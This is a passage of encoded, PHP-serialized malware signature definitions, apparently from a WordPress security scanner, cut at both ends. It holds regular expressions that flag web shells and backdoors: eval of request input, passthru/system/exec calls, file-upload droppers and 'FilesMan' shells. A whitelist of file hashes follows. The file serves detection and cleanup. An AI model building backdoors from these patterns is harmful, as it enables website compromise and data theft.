CI7aToxO3M6Njc5OiIvPFw_W3BoXHNdKygoXC9cKihbXipdKlwqKD8hXC8pKSpbXipdKlwqXC98W1x7XHNdKykqKFwkW2Etel8wLTldKykoXHMqXC9cKihbXipdKlwqKD8hXC8pKSpbXipdKlwqXC8pKlxzKj1bXjtdKztccyp8aWYoXHMqXC9cKihbXipdKlwqKD8hXC8pKSpbXipdKlwqXC8pKltcc1woXSsoaXNzZXR8bWQ1KVwoXCQoX1JFUVVFU1R8X1BPU1R8X=dFVHxfQ=9PS=lFfFx7WyInXVteXH1dK1x9KylccypcW1teXCldK1wpKyhcL1wqKFteKl=qXCooPyFcLykpKlteKl=qXCpcL3xbXHtcc1=rKSp8XC9cKihbXipdKlwqKD8hXC8pKSpbXipdKlwqXC9ccyopKj8oXCRbYS16MC=5XSsoXHMqXC9cKihbXipdKlwqKD8hXC8pKSpbXipdKlwqXC8pKlxzKj1ccyopPyhhc3NlcnR8ZXZhbHxcNHxcJFwxMChccypcW1teXF1dK1xdKykrKShccypcL1wqKFteKl=qXCooPyFcLykpKlteKl=qXCpcLykqXHMqXCgoXHMqXC9cKihbXipdKlwqKD8hXC8pKSpbXipdKlwqXC8pKlwkKF9SRVFVRVNUfF9QT1NUfF9HRVR8X=NPT=tJRXxce1siJ11bXlx9XStcfSspKFxzKlxbW15cXV=rXF=rKStccypbXjtdKzsoKGRpZXxleGl=fGVjaG98cHJpbnQpW147XSo7XHMqfChcL1wqKFteKl=qXCooPyFcLykpKlteKl=qXCpcL1xzKikqfFx9XHMqKSooJHxcPz4oPGZvcm1bXj5dKig-XHMqPGlucHV=W14-XSopKz5ccyo8XC9mb3JtPik_KS9pIjt9czozMToiaWYgaXNzZXQgZXZhbCBWYXJpYWJsZSBmdW5jdGlvbiI7YToyOntpOjA7czo1OiJIODhOWiI7aToxO3M6MjU3OiIvKFxAP3RvdWNoXCguKlwpKztccyopKihcJFthLXpfMC=5XHtcJFx9XSsoXHMqXFtbXlxdXStcXSkqXHMqPVteO1=rO1xzKikqaWZbXHNcKFwhXStpc3NldFtcc1woXStcJFthLXpfMC=5XHtcJFx9XSsoXHMqXFtbXlxdXStcXSkqW1wpXHNce1=rLio_XHMqKFwkW2Etel8wLTlce1wkXH1dKyhccypcW1teXF1dK1xdKSpccyo9XHMqKT9cQD9ldmFsXCguKj9cJFthLXpfMC=5XHtcJFx9XSsoXHMqXFtbXlxdXStcXSkqXHMqXCguKj9cKSs7WztcfVxzXSovaSI7fXM6NTc6ImVycm9yX3JlcG9ydGluZyBleGVjIHN5c3RlbSBwYXNzdGhydSBmb3BlbiBSRVFVRVNUIGZ3cml=ZSI7YToyOntpOjA7czo1OiJIODhOYSI7aToxO3M6MjM2OiIvPFw_Lis_KHNldF9=aW1lX2xpbWl=XCgwfGVycm9yX3JlcG9ydGluZ1woMHxleHBsb2RlXChbJyJdd3AtY29udGVudCkoPz=uKz91bmxpbmtccypcKCkoPz=uKz9wYXNzdGhydVxzKlwoKSg_PS4rP3N5c3RlbVxzKlwoKSg_PS4rP2V4ZWNccypcKCkoKD89Lis_Y3VybF9pbml=XHMqXCgpKD89Lis_ZmlsZV9nZXRfY29udGVudHNccypcKCl8KD89Lis_cmVhZGRpclxzKlwoKSkoPz=uKz9md3JpdGVccypcKCkuKy9pcyI7fXM6MTg6Ii9mdW5jdGlvbiB4IGV2YWwgeCI7YToyOntpOjA7czo1OiJIOEFJVCI7aToxO3M6MTUxOiIvKGlmXHMqXChbXlx7XStce1xzKik_ZnVuY3Rpb25ccysoW2Etel8wLTldKylccypcKFteXHtdK1x7XHMqKFwkW2Etel8wLTldK1xzKj1bXjtdKztccyopKlxAPyhhc3NlcnR8ZXZhbClcKC4rP1wyXChcJF8oUkVRVUVTfEdFfFBPUylUXFsuKz9cKTtbXHNcfV=qL2lzIjt9czoyMDoiR=VUX2RsIHNhZmVfbW9kZSBlbmQiO2E6Mjp7aTowO3M6NToiSDhGRmUiO2k6MTtzOjE4NToiLzxcP1twaFxzXStpZltcc1woXSsoaXNzZXRcKFwkX=dFVFxbWyciXWRsWyInXVxdXCl8XEBzdHJpcG9zW1woXHNdK1wkX1NFUlZFUlxbWyInXUhUVFBfVVNFUl9BR=VOVCkuKz9zYWZlX21vZGUuKz8oXD8-KFxzKjxcL2Rpdj5ccyo8XC9ib2R5PlxzKjxcL2h=bWw-KT98PFwvYm9keT5ccyo8XC9odG1sPlsnIjtcc1=qJCkvaXMiO31zOjE=OiJHTE9CQUxTIDAgZXZhbCI7YToyOntpOjA7czo1OiJIOEZGZiI7aToxO3M6ODc6Ii8oXCQoR=xPQkFMU1xbWyciXSkqWzBvT1=rWyciXF1cPVwuXHNdK1teO1=rO1xzKikrZXZhbFwoLitbXCldK1s7XSpccyoocmV=dXJuW147XSo7KSovaSI7fXM6MjE6ImtleXNwYXQgdmlhZ3JhIGNpYWxpcyI7YToyOntpOjA7czo1OiJIOEZGZyI7aToxO3M6MTAzOiIvZXJyb3JfcmVwb3J=aW5nXCgwXCk7XHMqXCRrZXlzcGF=Wz1cc1=rYXJyYXlbXChcc1=rKChbJyJdKSh2aWFncmF8YW1veGljaWxsaW58Y2lhbGlzKVwyW1xzLF=rKXsyfS4rL2lzIjt9czo1MToic2Vzc2lvbl9zdGFydCBlcnJvcl9yZXBvcnRpbmcgc2V=X3RpbWVfbGltaXQgZm9vdGVyIjthOjI6e2k6MDtzOjU6Ikg4SkY1IjtpOjE7czoxMTQ6Ii88XD9bcGhcc1=rc2Vzc2lvbl9zdGFydFwoXCk7XHMqZXJyb3JfcmVwb3J=aW5nXCgwXCk7XHMqc2V=X3RpbWVfbGltaXRcKC4rPzxcP1xzKmVjaG9bXChcc1=qXCRmb29=ZXJbXCk7XHNdK1w_Pi9pcyI7fXM6MzM6Im1kNXRhZ2dlZCBldmFsIHZhcmlhYmxlIGZ1bmN=aW9ucyI7YToyOntpOjA7czo1OiJIOE9BdyI7aToxO3M6NDg1OiIvKCg_PCF2YXIgKShcL1wqKFteKl=qXCooPyFcLykpKlteKl=qXCpcL1xzKikqXEA_KFwkW2Etel8wLTldKylbXHNcLl=qPVxzKigoJ1teJ1=qKD88IV9lKSd8IlteIl=qInxcJFthLXpfMC=5XSspW1xzXC5dKikrW147XSo7XHMqKSs_KChcL1wqKFteKl=qXCooPyFcLykpKlteKl=qXCpcL1xzKikqXEA_KFwkW2Etel8wLTldKylbXHNcLl=qPVxzKigoJ1teJ1=qKD88IV9lKSd8IlteIl=qInxcJFthLXpfMC=5XSt8YXJyYXlcKHxzdHJyZXZcKClbXHNcLl=qKStbXjtdKjtccyp8Zm9yZWFjaFtccyhdK1teXHtdK1x7W15cfV=rXH1ccyopKz8oXC9cKihbXipdKlwqKD8hXC8pKSpbXipdKlwqXC9ccyp8KFwkW2Etel8wLTldKylbXHNcLl=qPVxzKikqXEA_KGV2YWx8XCRbYS16XzAtOV=rKVwoW15cKV=qP1tcKTtcc1=qKChcNHxcMTB8XDE1KVxzKihcW3xcKClbXlwpXSpbXClcc1=rO1xzKikrKFwvXCooW14qXSpcKig_IVwvKSkqW14qXSpcKlwvXHMqKSovaSI7fXM6NTY6ImlmIGlzc2V=IFBPU1QgZmlsZV9nZXRfY29udGVudHMgZm9wZW4gZndyaXRlIGZjbG9zZSBleGl=IjthOjI6e2k6MDtzOjU6Ikg5OEFHIjtpOjE7czo=NTU6Ii8oXCRhdXRoX3Bhc3Nccyo9Lis_KT8oaWZbXChcc1whXSsoZnVuY3Rpb25fZXhpc3RzW1woXHNdKyhbIiddKShbYS16XzAtOV=rKVw=W15ce1=rW1x7XHNdKyhcJFthLXpfMC=5XSspXHMqPVxzKnxpc3NldFtcKFxzXSspXCRfKFJFUVVFU1R8R=VUfFBPU1R8U=VSVkVSKVxbLis_ZmlsZV9nZXRfY29udGVudHNcKFxzKigoWyciXSlbaHRwczpdK1wvXC9bXlw5XStcOVtcc1wuXStcNnxfX=ZJTEVfXykuKz8oZmlsZV9wdXRfY29udGVudHNcKF9fRklMRV9ffGZvcGVuXCguKz9md3JpdGVcKC4qP2ZjbG9zZVwoKS4qPyhyZXR1cm5bXjtdKnxleGl=KTtbXHNcfV=qKSsoKGV4dHJhY3RbXHNcKF=rfGlmW1xzXChdK2lzc2V=W1woXHNdK1wkXyhSRVFVRVN8R=V8UE9TKVRcW1teXHtdK1tcc1x7XStpZltcc1=qXChbXHNdKmZpbGVfZXhpc3RzW1xzXSpcKFteXHtdK1tcc1x7XSspW15cfV=rW1x9XHNdKyk_L2lzIjt9czoyNToiZnVuY3Rpb24gQXJyYXkgcHJpbnQgZXhpdCI7YToyOntpOjA7czo1OiJIOEpGOCI7aToxO3M6NTkxOiIvPFw_W3BoXHNdKyhcJFtfXC1cPlwuYS16MC=5XHtcWyciXF1cfV=rXHMqPVteO1=rO1xzKikqKChmdW5jdGlvblxzK1thLXpfMC=5XStcKC4qP1wpXHMqXHsoPyEgXH=7KShcJFtePV=rPVxzKlsnIl17Mn=pP3xmb3JbXHMoXStbXlx7XStce1teXH1dK1x9Lio_fChyZXR1cm58Z2xvYmFsKVxzKyhcJFx7W15cfV=rXH=rKT9bXjtdKjt8XCRcey4rP1x9XHMqXCguKj9cKSs7fFwkXHsuKz9cfVxzKj1ccyphcnJheVwoKChbYS16XzAtOV=rXCguKj9cKSssXHMqKStbYS16XzAtOV=rXCguKj8pP1wpKzt8aWZccypcKC4qP1wpK1xzKlx7fGVsc2VbXHNce1=qfFwkW19cLVw-XC5hLXowLTlce1xbJyJcXVx9XStbXHNcLl=qPShccypjaHJcKC4qP1wpK3woLis_XF4pezUsfXxbXjtdK1xeXHMqXGQrKVteO1=qO3xleGl=XCguKj9cKSs7fChcJChce1thLXpfMC=5XStcKC4rP1wpXH=oXHMqXFtbXlxdXSpcXSspKnxjb25=ZW5=fHVybClbXHNcK1wuO1x9PD5cLl=qKSs9XHMqKFtcQFwkXHtdKlthLXpfMC=5XH1dKyhcKC4rP1wpfFxbLis_XF=pKVx9Kjt8Zm9yZWFjaC4rP1xzK2FzXHMrW15cKV=rW15ce1=rXHspWztcc1x9XSopezUwLH=oJHxcPz4pL2kiO31zOjQwOiJwaHAgaWYgaXNzZXQgR=VUIGVjaG8gaWYgUE9TVCBjb3B5IEZJTEVTIjthOjI6e2k6MDtzOjU6Ikg4SkY5IjtpOjE7czo2MzM6Ii88XD9bcGhcc1=qKGVjaG9bXjtdKjtccyp8ZXJyb3JfcmVwb3J=aW5nXCgwXCk7XHMqfFwvXCouKj9cKlwvXHMqKFwkW2Etel8wLTldK1xzKj1bXjtdKztccyp8W1wvXC98XCNdW15cbl=qXHMqKSsoaWZbXHNcKF=raXNzZXRcKFwkXyhSRVFVRVN8R=V8UE9TKVRcW1teXF1dK1xdKVteXCldKltcKVxzXHtdKyhcJFthLXpfMC=5XStccyo9XHMqXCRfW2Etel8wLTldK1xbW15cXV=rXF=7XHMqKSsoXCRbYS16XzAtOV=rXHMqPVxzKlwkW2Etel8wLTldK1woW15cKV=rXCkrO1xzKikrLio_XDNbXlx7XStbXlx9XStcfVxzKihcPz5ccyo8XD9bcGhcc1=qKT8pKmlmW1xzXChdK2lzc2V=XChcJF8oUkVRVUVTfEdFfFBPUylUW15cKV=rW1wpXHNce1=rKChlY2hvfHByaW5=fFwkW2EtelxfMC=5XStccyo9KVteO1=rO1xzKikraWZbXHNcKF=rXCRfKFJFUVVFU3xHRXxQT1MpVFteXCldK1tcKVxzXHtdK2lmW1xzXChdK1xAP2NvcHlcKChbXHNcLF=qXCRfRklMRVMoXFtbXlxdXStcXSkrKStbXClcc1=rXHtbXlx9XSsoW1x9XHNdKyhlbHNlW1xzXHtdK1teXH1dKyk_KSsoW1wvXC98XCNdW15cbl=qXHMqfFwvXCouKj9cKlwvXHMqKSooXD8-XHMqKDwodGl=bGU-aGFja2VkLmJ5W15cbl=qfFwvW2Etel=rPilccyopKnwkKS9pcyI7fXM6MTg6ImF1dGhfcGFzcyBGaWxlc=1hbiI7YToyOntpOjA7czo1OiJIOEtMTCI7aToxO3M6MjA=OiIvPFw_W3BoXHNdK2lmW1xzXChdK2lzc2V=XHMqXChccypcJF8oUkVRVUVTfEdFfFBPUylUXFsoWyciXSkoW2Etel8wLTldKylcMlteXHtdK1x7XHMqc3dpdGNoIFwoXCRfXDFUXFtcMlwzXDJcXS4rP2RlZmF1bHQ6W15cfV=rW1x9XHNdK2RpZVwoW15cfV=rW1x9XHNdK2lmW1xzXChdK1wkd3BkYlwtPmdldF92YXJcKC4rP2V4aXQ7W1x9XHNdKygkfFw_PikvaXMiO31zOjg4OiJwaHAgc2V=X3RpbWVfbGltaXQgZmlsZV9nZXRfY29udGVudHMgUkVRVUVTVCBmaWxlX2dldF9jb25=ZW5=cyBGSUxFUyBmb3BlbiBSRVFVRVNUZndyaXRlIjthOjI6e2k6MDtzOjU6Ikg4S=xPIjtpOjE7czoxNTQ6Ii88XD9bcGhcc1=rLis_c2V=X3RpbWVfbGltaXRcKC4rP2ZpbGVfZ2V=X2NvbnRlbnRzXChcJF8oUkVRVUVTfEdFfFBPUylULis_ZmlsZV9nZXRfY29udGVudHNcKFwkX=ZJTEVTXFsuKz9mb3BlblwoXCRfKFJFUVVFU3xHRXxQT1MpVC4rP2Z3cml=ZVwoLis_KFw_PikvaXMiO31zOjIzOiJjbGVhcnN=YXRjYWNoZSBoZXJlIGRpZSI7YToyOntpOjA7czo1OiJIQTdBSiI7aToxO3M6NDY4OiIvPFw_W3BoXHNdKihlcnJvcl9yZXBvcnRpbmdcKDBcKTtccyopKihpZltcc1woXCFdK2lzc2V=W1xzXChdK1wkXyhSRVFVRVN8UE9TfEdFKVRcW1snIl1bMC=5X2Etel=rWyciXVxdW1wpXHNce1=rKChlY2hvfHJlcXVpcmV8XCRbMC=5X2Etel=rXHMqPVxzKihcJHwoWyciXSkuKj9cNykpW147XSs7W1xzXH1dKykqKSsoXCRbMC=5X2Etel=rXHMqPVxzKik_KFwkd3BkYlwtPnF1ZXJ5XChccyp8bXlzcWxfY29ubmVjdFtcc1woXStcJF8oUkVRVUVTfFBPU3xHRSlUXFtbJyJdWzAtOV9hLXpdK1snIl1cXS4rPykiSU5TRVJUXHMrSU5UT1tcc1xgIlwuXCQwLTlfYS16XC1cPl=rdXNlcnNbXHNcYF=rXCguKygobXlzcWxfY2xvc2VcKFteXCldKlwpfGNsZWFyc3RhdGNhY2hlLitoZXJlO1xzK2RpZXwoXCRbMC=5X2Etel=rKVxzKj1ccypcQGZpbGVfZ2V=X2NvbnRlbnRzXCguK1wxM1tcKVxzXSopO1tcfVxzXSspKygkfFw_PikvaXMiO31zOjEwOiJ1bnNldCBzZWxmIjthOjI6e2k6MDtzOjU6Ikg4TUUxIjtpOjE7czozNDI6Ii8oXCRbYS16XzAtOV=rKVxzKj1ccypfX=ZJTEVfXy4rdW5zZXRcKFxzKlwxW1wpXHNdKjtccyp8PFw_W1xzaHBdKihcQD9jaG1vZFwoW15cKV=rXCk7XHMqKSppZltcc1woXCFdKyhpc3NldHxlbXB=eSlbXHNcKF=rXCRfKFJFUVVFU1R8R=VUfFBPU1R8Q=9PS=lFKVteXHtdK1tce1xzXSooXCRbYS16XzAtOVx7XH1dKylccyo9Lis_bWtkaXJbXHNcKCInXC5cL1=rXDVbXCk7XHNdK2ZvcmVhY2guKz9ce1teXH1dK1x9XHMqKGlmW1xzXChcIV=raXNfZGlyW15cKV=rXCkrW1x7XHNcQF=qbWtkaXJbXHNcKF=rW15cKV=rXCkrO1tcc1x9XSopKy4qPyh1bmxpbmtcKFteXCldK1wpO1xzKikrKCR8XD8-KS9pcyI7fXM6NDE6ImlmIGlzc2V=IFJFUVVFU1QgdG91Y2ggbW92ZV91cGxvYWRlZF9maWxlIjthOjI6e2k6MDtzOjU6Ikg4TUUyIjtpOjE7czozNDY6Ii8oKGlmW1woXHNcIV=rKChwcmVnX21hdGNoW1xzXChdK1teLF=rLFxzKik_XDh8KGlzc2V=fGVtcHR5KVtcc1woXStcJF8oUkVRVUVTVHxHRVR8UE9TVHxGSUxFUykpXHMqXFtbXlx7XStce1xzKigoXCRbYS16XzAtOV=rKVxzKj1bXjtdKztccyopKikrKGZvcmVhY2hccypcKFteXCldK1wpK1tcc1x7XSppZltcc1woXStbXlwpXStcKStccypjb25=aW51ZTtccyopPygoXCRbYS16XzAtOV=rKVxzKj18aWZccypcKCkqW1xzXEBdKihtb3ZlX3VwbG9hZGVkX2ZpbGV8dG91Y2h8XCRbYS16XzAtOV=rKVxzKlwoW15cO1=rOyhbXH1cc1=qKChcJFthLXpfMC=5XStccyo9fGVjaG8pW147XSs7XHMqKSopKyl7Mix9L2kiO31zOjU4OiJwaHAgaWYgaXNzZXQgUkVRVUVTVCBldmFsIGZpbGVfcHV=X2NvbnRlbnRzIGluY2x1ZGUgdW5saW5rIjthOjI6e2k6MDtzOjU6Ikg5UEtDIjtpOjE7czo2Mzg6Ii88XD9bcGhcc1=rKFxAPyhpZ25vcmVfdXNlcl9hYm9ydHxzZXRfdGltZV9saW1pdHxpbmlfc2V=fGVycm9yX3JlcG9ydGluZylcKC4qP1wpO1xzKikqKFwkW2Etel8wLTldK1xzKj=uKz87XHMqKSoodHJ5XHMqfGlmW1xzXChcIV=rKChlbXB=eXxzdHJsZW58aXNzZXQpXChcJF8oUkVRVUVTfEdFfFBPUylUfFtcJGEtel8wLTldKltcc1w9XSpzY2FuZGlyW1woXHNdKyhcJFthLXpfMC=5XSspKVteXHtdKylcey4qPyhcJFthLXpfMC=5XSspXHMqPS4qPyhjdXJsX1teXCldK3xldmFsfGZpbGVfZ2V=X2NvbnRlbnRzKVwoKFw4fFw5KS4rP2ZpbGVfLi5=X2NvbnRlbnRzW1woIF=rKFtcJGEtel8wLTlcWyciXF1cLl=rKS4rPyhlY2hvW1xzXChdK1wxMnxpbmNsdWRlKF9vbmNlKT9bXChcc1=rXDEyLis_dW5saW5rW1woXHNdK1wxMnxjdXJsX2luaXRcKC4rP2N1cmxfc2V=b3B=XChbXixdKyxccypDVVJMT1BUX1VSTFssXHNdK1wxMnxcfVxzKmNhdGNoXHMqXChccypFeGNlcHRpb25ccypcJFthLXpfMC=5XStbXClcc1=qXHtbXlx9XSpcfVxzKnxmaWxlX2dldF9jb25=ZW5=c1tcc1woIiddK2h=dHBbXjtdKztccypcQGZpbGVfcHV=X2NvbnRlbnRzXCguKz9lcnJvcl9yZXBvcnRpbmdbXChcczBcKV=rO1xzKikuKj8oXD8-fCQpL2lzIjt9czo=MzoicGhwIGNoZGlyIFJFUVVFU1QgZ2V=Y3dkIG1vdmVfdXBsb2FkZWRfZmlsZSI7YToyOntpOjA7czo1OiJIOTVFdiI7aToxO3M6Mjc2OiIvPFw_Lis_KGNoZGlyW1woXHNdK1wkXyhSRVFVRVN8UE9TfEdFKVRcW3xlcnJvcl9yZXBvcnRpbmdbXChcc1=rMC4rP1tnc11ldF8odGltZV9saW1pdFtcKFxzXSswfG1hZ2ljX3F1b3Rlcy4rP2hhY2tlW3JkXSkpLis_KFwkW2Etel8wLTldKylbPVxzXEBdK2dldGN3ZFtcc1woXSsuKz8oY29weXxtb3ZlX3VwbG9hZGVkX2ZpbGUpW1xzXChdKyguKz91bmxpbmtbXHNcKF=rLis_c2NhbmRpcltcc1woXStcNHxcJF9GSUxFU1xbW14sXStbLFxzXSsoXCRfXDJ8XDQpKS4rPyhcPz58JCkvaXMiO31zOjM1OiJlcnJvcl9yZXBvcnRpbmcgaW5pX3NldCB1bmxpbmsgRklMRSI7YToyOntpOjA7czo1OiJIOTVGNSI7aToxO3M6MzAwOiIvXEA_ZXJyb3JfcmVwb3J=aW5nXCgwXCk7XHMqKGluaV9zZXRcKC4rXEA_dW5saW5rXChfX=ZJTEVfX1wpO3woaWZbXHNcKFwhXSsoaXNzZXRcKHxmaWxlX2V4aXN=c1woKT9ccypcJF8oU=VSVkVSfFJFUVVFU1R8R=VUfFBPU1R8RklMRVMpXFtbXlxdXStcXStbXlwpXSpcKVtcKVxzXHtdKihlY2hvW147XSs7XHMqKSopK1xAP2NvcHlcKChbXHNcLF=qXCRfRklMRVMoXFtbXlxdXStcXSspKykrW1wpXHNdKztbXHNcfV=rXD8-XHMqKDwoZm9ybXxpbnB1dClbXj5dKz5ccyopKzxcL2Zvcm=-XHMqKDxcP1twaFxzXStcfSspPykvaXMiO31zOjExOiJpbmNsdWRlIEdFVCI7YToyOntpOjA7czo1OiJIOTVGOCI7aToxO3M6MjkzOiIvKChcJFswLTlfYS16XSspXHMqPVxzKihbIiddKShbYS16XC9fXC=wLTlcLl=qXFx4W2EtZjAtOV17Mn=pK1teXDNdKj9cMzspP1tcQFxzXSooaW5jbHVkZXxyZXF1aXJlKShfb25jZSk_W1xzXChdKihcL1wqW15cKl=qKFwqW15cKlwvXSopK1wvXHMqKSpbXChcc1=qKChbIiddKShbYS16XC9fXC=wLTlcLl=qXFx4W2EtZjAtOV17Mn=pK1teXDEwXSo_XDEwfFwyfFwkXyg_IVJFUVVFU1RcWyd=YXJnZXQnXF=7KShQT1N8UkVRVUVTfEdFKVRccyooXFtbXlxdXStcXVxzKnxce1teXH1dK1x9XHMqKSspW1xzXCldKjsvaSI7fXM6NTM6InBocCBmdW5jdGlvbiBmaWxlX2dldF9jb25=ZW5=cyBmd3JpdGUgdW5saW5rIF9fRklMRV9fIjthOjI6e2k6MDtzOjU6Ikg5UzZaIjtpOjE7czoyMjc6Ii88XD9bcGhcc1=rKHNyYW5kXChbXjtdKztccyp8XCRbYS16XzAtOV=rXHMqPVteO1=rO1xzKnxcL1wvW15cbl=qXG5ccyopKmZ1bmN=aW9uXHMrKFthLXpfMC=5XSspXCguK2ZpbGVfLi5=X2NvbnRlbnRzXCguK2ZvcGVuXCguK2Z3cml=ZVwoLitmY2xvc2VcKC4rKFwyXCguK3x1bmxpbmtcKF9fRklMRV9fXCk7XHMqfGVjaG9bXjtdKjtccypleGl=XChbXCk7XHNcfV=qKXsyLH=oJHxcPz5ccyopL2lzIjt9czozMzoiYXV=aF9wYXNzIEZpbGVzTWFuIHNhZmVfbW9kZSBldmFsIjthOjI6e2k6MDtzOjU6Ikg5UzZrIjtpOjE7czo3NjoiLzxcPyg_PS4qXCRhdXRoX3Bhc3MpKD89LipGaWxlc=1hbikoPz=uKnNhZmVfbW9kZSkoPz=uKihldmFsfG5ldHN=YXQpXCgpLisvcyI7fXM6MTA1OiJwaHAgZXJyb3JfcmVwb3J=aW5nIGluaV9zZXQgc2V=X3RpbWVfbGltaXQgaWYgaXNzZXQgUkVRVUVTVCBmaWxlX2dldF9jb25=ZW5=cyBmaWxlX3B1dF9jb25=ZW5=cyB1bmxpbmsgaWUiO2E6Mjp7aTowO3M6NToiSDlTNzYiO2k6MTtzOjQ5ODoiLzxcP1twaFxzXSsoXC9cKlteXCpdKihcKlteXCpcL1=qKStcL1xzKnxcL1wvW15cbl=qXHMrKSooaWdub3JlX3VzZXJfYWJvcnRccypcKFteO1=qO1xzKnxcJFthLXpfMC=5XStccyo9W147XSpbO1xzXSspKygoZWxzZVtcc1x7XSp8aWZbXHNcKF=rW147XSt8XCRbYS16XzAtOV=rXHMqPVxzKikqKGVycm9yX3JlcG9ydGluZ3xpbmlfc2V=fHxzZXRfdGltZV9saW1pdHx3aGlsZSg_PVwoMVwpKSlccypcKFteO1=rO1tcfVxzXSspKygoaWZbXHNcKF=rKGlzX3dyaXRhYmxlfGlzc2V=fGZpbGVfZXhpc3RzKVtcc1woXStcJChfUkVRVUVTVHxfR=VUfF9QT1NUfHBhdGgpW147XSspPyhcQD8oZmlsZV9nZXRfY29udGVudHN8ZmlsZV9wdXRfY29udGVudHN8dW5saW5rfGNobW9kKVxzKlwoW147XSs7KFtcfVxzXSooaWZbXHNcKF=rW15cKV=rXCkrfGVsc2UpP1tce1xzXSooZGllfHByaW5=fHNsZWVwfGVjaG8pW147XSo7KSpbXH1cc1=qKStbXH1cc1=rKXszLH=uKj8oJHxcPz4pL2lzIjt9czozNzoicGhwIGNyZWF=ZV9mdW5jdGlvbiBWYXJpYWJsZSBmdW5jdGlvbiI7YToyOntpOjA7czo1OiJIOVM3RyI7aToxO3M6MjM2OiIvPFw_W3BoXHNdKihcL1wqKFteXCpdKlwqW15cL1=pKlteXCpdKlwqXC9ccyp8XC9cLy4qXHMqKSooKFwkW2Etel9cLTAtOV=rKVxzKj=uKztccyp8aWZccypcKFteXHtdK1x7XHMqKSsoKFwkW2Etel9cLTAtOV=rKVxzKj1ccyopP2NyZWF=ZV9mdW5jdGlvblwoW14sXSssXHMqKFw=W147XSs7W1xzXEBdKlw2XCh8IihcXChbMC=5XXsyLDN9fHhbMC=5YS1mXXsyfSkpKyIpW15cKV=qW1wpO1xzXH1dKygkfFw_PikvaSI7fXM6NDI6ImlmIGlzc2V=IFJFUVVFU1QgZXZhbCBvciBmaWxlX3B1dF9jb25=ZW5=cyI7YToyOntpOjA7czo1OiJIOVM3SCI7aToxO3M6MzcxOiIvPFw_W3BoXHNdKyhmdW5jdGlvbiAoW2Etel8wLTldKylcKFteXHtdK1tce1xzXSsuK3JldHVyblteO1=qO1t9XHNdKyk_aWZbXHNcKF=raXNzZXRbXHNcKF=rXCRfKFJFUVVFU3xHRXxQT1MpVChccypcW1teXF1dK1xdKStbXClcc1x7XSsoXCRbYS16X1wtMC=5XStccyo9XHMqLis_O1xzKikqKCgoaGVhZGVyfHVubGluaylcKFteO1=rWztcc1=rKXsyLH1bXH1cc1=qZWxzZVtce1xzXSsoXCRbYS16X1wtMC=5XStccyo9XHMqLis_O1xzKikqKChcJFthLXpfXC=wLTldK1xzKj1ccyopP1xAPyhldmFsfFwyKVwoLis_XCk7XHMqKXsyLH18ZmlsZV9wdXRfY29udGVudHNcKFteLF=rLFxzKmJhc2U2NF9kZWNvZGVcKC4rP1wpOylbXH1cc1=qKFw_PnwkKS9pcyI7fX1zOjg6InRpbXRodW1iIjthOjE6e3M6Mjk6Im91dGRhdGVkIHZlcnNpb25zIG9mIFRpbVRodW1iIjthOjI6e2k6MDtzOjU6IkgxUUpFIjtpOjE7czo2MDoiLy4rVGltVGh1bWIuK2RlZmluZVxzKlwoW1xzJyJdK1ZFUlNJT=5bXHMnIl=rLFtccyciXSsxXC4uKy9zIjt9fXM6OToid2hpdGVsaXN=IjthOjI6e3M6MzoicGhwIjthOjI4OntpOjA7czo1OiJGQThIZCI7czozODoiNTg3M2NkMWNlYTYxMDgyMDJkMjEzNDdmMDFmMDRkY2ZPODE3MjgiO3M6NToiRDc1OXAiO3M6Mzk6IjAxMzYzNzI4Yzg=M2ZmOTNlOTZiNjk4M2NlMzhlYmE2TzE5NTYxOCI7czo1OiJENUE4MyI7czozODoiZDVmM2M5Y2FmZjE=ZDU3Yzg2MDhkNzhkYjAwOTRiZTBPNzM2NDMiO3M6NToiRDc1RDkiO3M6Mzg6IjU3YWY=OTgxOGJiYjk=OWRjMGFjNjM4NjczODY1NWJiTzI1ODUyIjtzOjU6IkQ3SkQ5IjtzOjM4OiJkNDk=MDQyNjBkNzlhNGNjMzc1NWMwMGY1NWRlMjA4OU8yNTY2MiI7czo1OiJEOFY4QSI7czozNzoiODY2MWZlMmJmYTU5OTVmNTQ2YTMzMDQ3ZTkwMzg1NmNPMTEzNiI7czo1OiJESUNGQyI7czozODoiODEyNWQ=MmM=YmU1NDNmODc=ZWE1ZjZhMWI1YmRlNTVPMjU4OTQiO3M6NToiRElDRkQiO3M6Mzk6ImVkZGI1ZmRhNzRkNDFkYmRhYzAxODE2NzUzNmQ4ZDUzTzIzMTMzOCI7czo1OiJESUNGRSI7czozODoiYzE1YTRkNWMzODM=NDRiOTVkMjg1NTlmODM=ODExMWRPMjI1ODgiO3M6NToiRTFSMnYiO3M6Mzg6ImUyMDgzOWM1NTlhNjZjN2NmNjI4NjUzYmEyNDg=ZWFlTzI2Mzk1IjtzOjU6IkUxUjJ4IjtzOjM4OiJmMzM4MmVjMTVjMDMwYmQzMmUyOTNmYWYzNDk3ZTI1M=8xMTIyNiI7czo1OiJFMjMwQyI7czozNzoiMjhhOTJmNDY=OThkMzJiOWE3NGM1ODQ3Zjc1YzkxMmVPNzM5OSI7czo1OiJFMjMwQyI7czozNzoiZjAwYWFmMDFmZjAyZDU3NTZjMjY3YmNmOTIwZTRjMjhPMTU=MCI7czo1OiJFMkFNZiI7czozODoiNTdjNjQ3ZDkzZmJkNDc4NjhiODdiOTIxYmVlNjNhZjhPMjYzNzYiO3M6NToiRTVFRG8iO3M6Mzk6IjhlMmFmNDg4NmRjODFhNWQ5Mjg5ODY1YmJiODEzZWQxTzE5NTYxNyI7czo1OiJFNUlOUCI7czozNzoiZjgwZDllZjRiN2JmZDllZjU=MmQ5MDg3YTFkYjJhZTlPMjAxMCI7czo1OiJFN=VNdiI7czozODoiNWY5MjdmM2E5NzMyMThkMDdlNDNlYTFjNjlmYzAzMzFPMjY3NzYiO3M6NToiRUE2NmwiO3M6Mzg6ImE1YjFhNzNlMGM=Mjk4OTUwNzUwYThiY2Q5NjI3ZWFmTzI2ODExIjtzOjU6IkVDQ=UwIjtzOjM3OiI2NDk=NGUyMjUxMTNiZTE4Mzk=ZDViYzAxZmIzYjUzN=83NTMwIjtzOjU6IkVDQ=UzIjtzOjM4OiI5N2U=MzhkNmM5YzY=YTIwMmI5MzA3ODZkMjc2MjA1Yk82MjQ1OCI7czo1OiJFQ=NFMyI7czozODoiNjdlYzFiMTUzY2MzZjNlMzZmYmVlNTkwMjlhOTNkNGFPMjU5MTQiO3M6NToiRUNKS=YiO3M6Mzc6IjgzNjY1N2RiYTVjYjIyOTAwMDAyNDQ3NzY2MGU5ZGRmTzgzNjkiO3M6NToiRjQzNzMiO3M6Mzg6ImY2MDA3OWZlYz